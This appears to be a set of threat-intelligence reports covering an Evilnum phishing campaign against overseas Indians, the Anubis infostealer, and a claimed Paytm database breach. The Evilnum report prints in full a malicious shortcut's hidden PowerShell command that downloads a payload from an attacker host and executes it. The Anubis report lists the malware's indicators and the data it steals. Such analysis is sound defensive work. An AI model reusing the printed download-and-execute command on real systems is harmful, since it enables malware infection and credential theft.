Evilnum Infostealer targets overseas Indians

Evilnum group targets Indian NRIs with spear phishing emails claiming to be a document with Income tax rules, that delivers malicious infostealer malware. The main goal is to spy on HNIs, steal credentials, and access valuable financial information. The stolen information is usually sold in underground forums to other criminals.

The attack vector typically starts with a spear phishing email, with link to ZIP archive that contains maliciously crafted Windows shortcut file disguised as “Income tax new rules for NRI.pdf.lnk“.

Lnk File: Income tax new rules for NRI.pdf.lnk
Link Flags: HAS SHELLIDLIST | POINTS TO FILE/DIR | NO DESCRIPTION | HAS RELATIVE PATH STRING | HAS WORKING DIRECTORY | HAS CMD LINE ARGS | HAS CUSTOM ICON
File Attributes: ARCHIVE
Create Time: 2019-03-19 10:16:56.805162
Access Time: 2019-03-19 10:16:56.805162
Modified Time: 2019-03-19 10:pdf16:56.805162
Target length: 451584
Icon Index: 0
ShowWnd: SW_SHOWMINNOACTIVE
HotKey: 0
Target is on local volume
Volume Type: Fixed (Hard Disk)
Volume Serial: 26da47ae
Vol Label:
Base Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(App Path:) Remaining Path:
Relative Path: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working Dir: %SystemRoot%\system32\
Command Line:
-w hidden -nop -ep bypass -c “IEX(New-Object System.Net.WebClient).DownloadFile(‘https://ccdn.microsoftdocs.workers.dev/_uploads/Income tax new rules for NRI.pdf’,’%userprofile%\Downloads\Income tax new rules for NRI.pdf’);(New-Object -com Shell.Application).ShellExecute(‘%userprofile%\Downloads\Income tax new rules for NRI.pdf’);IEX(New-Object System.Net.WebClient).DownloadFile(‘https://ccdn.microsoftdocs.workers.dev/_uploads/event.dat’,’C:\Users\Public\Music\event.log’);IEX(New-Object System.Net.WebClient).DownloadFile(‘https://ccdn.microsoftdocs.workers.dev/_uploads/conhost.dat’,’%temp%\conhost.exe’);(New-Object -com Shell.Application).ShellExecute(‘%temp%\conhost.exe’);”
Icon filename: .\pdf.pdf

The LNK file has Powershell script which downloads the malicious binary payload along with a PDF document to the victim’s machine.

The binary is downloaded as conhost.exe in %temp% directory. Downloaded binary file is signed with an invalid digital certificate.

Binary has a list of virtual environment MAC addresses and will not execute it’s payload, if a match is found. The executable code is protected and executes the malicious payload only after decrypting it. Upon execution, the malicious payload sends the following information to C2 server,

  • Username
  • UUID
  • Machine Name
  • Antivirus Installed
  • OS Name
  • OS Version
  • OS installation date

The malware is capable of performing following malevolent functionalities in response to the commands received from c2 server,

  • Keylogging
  • Screen Capturing
  • Downloading additional malwares
  • Executing commands

In other incidents, Evilnum appears to use maliciously crafted windows shortcut file (LNK) disguised as scans of credit cards, ID cards, utility bills and other documents to lure the victims.

God of death steals your data: Ransomware/Anubis

A new info stealing malware Ransomware/Anubis is now actively distributed in the wild. The malware code is forked from Loki malware. The malware is developed in c# and the authors have called it as Anubis in it’s settings, sharing the name with an unrelated family of Android banking malware.

Technical Details

Binary Info
MD5: B73E3725DDCDDBBF83DB1610C162A950
SHA1: 5862E19E3A31F88DD7D69F7247B0AEAB872F8EFA
Size: 266,240 bytes
DateTimeStamp: 22 June 2020 8:57:44 PM GMT

Anubis has code to steal system info, screen shots, passwords, browser cookies, credit card details, crypto currency wallets, lock files, etc

The domain anubis.fun where the admin panel is hosted points to 3 ipv4 addresses,
104.27.159.138
104.27.158.138
171.67.191.19 (down)

The admin panel is protected by authentication.

The site uses SSL certificate from GlobalSign.


It captures the screenshots of webcam and also the current screen.


It steals the credentials from Filezilla and Telegram applications.

It steals the web cookies stored by the web browsers. It also steals the crypto wallets of the following Crypto currencies,

  • Bitcoin
  • Bytecoin
  • Dashcoin
  • Electrum
  • Ethereum
  • Litecoin

It steals credit card details from web browser storage.

It steals credentials from NordVPN.


It collects following information from infected machines,

  • Public IP address
  • Country
  • State
  • City
  • Timezone
  • ZIP
  • ISP
  • Coordinates
  • User name
  • Machine name
  • UUID
  • HWID
  • CPU
  • GPU
  • RAM
  • MAC id
  • Screen resolution
  • System language
  • Browser versions

The collected information are send to the C2 server. The C2 URI is hard coded in the binary settings.

It steals credentials from Steam, a video game distribution software.


The ransomware (file lock) functionality doesn’t gets executed in this version, but would execute if the feature is turned on in binary settings.

The encrypted (locked) files are renamed by appending “.loki” string. The File locker module doesn’t encrypt the files with size less than 30MB.

The ransomware note is hard coded in the binary.

 

Paytm database stolen by Hackers

A massive database breach has reportedly hit Paytm, a payment system and financial technology company. The infamous hacker group KelvinSecTeam Hackers are reportedly responsible for the attack.

KelvinSecTeam

Usually the members of the group disguised as ethical hackers offer help to companies participating in bug bounty programs. The group seem to operating underground for more than 3 years illegally hacking into systems and accessing sensitive information that belongs to organizations and individuals.

The profile of the team in a hacker forum claims their occupation as APT (Advanced Persistent Threats). The domain kelvinsecuritylabs.com is registered in Godaddy on 2020-05-21.

The hacking group sells stolen databases via store.kelvinsecuritylabs.com or via

  • Email: vipsuscriptionkelvinsecurityv1@protonmail.com
  • Telegram: Contact @kelvinsecurity

The group had tweeted the credentials of hacked accounts,

Paytm Breach

The volume of data stolen is around 85GB. Our sources claim that the attackers have demanded a ransom of 10 ETH.

KelvinSecTeam was able to, upload Adminer tool on Paytm server and,  gain unrestricted access to their entire databases. Adminer, is a single PHP file for managing content in MySQL databases.

Sources also claim the attackers were helped by an insider in Paytm developers team. The message from the attackers claim they have received the database via a Paytm developer. The attackers also claimed they are receiving ransom from Paytm. The hacking team is infamous for selling hacked databases. The previous behavior of the hacking team indicates, the team leaks the stolen information even after the ransom was paid.

Paytm spokesperson has assured that the company data is safe, but has not confirmed the hack.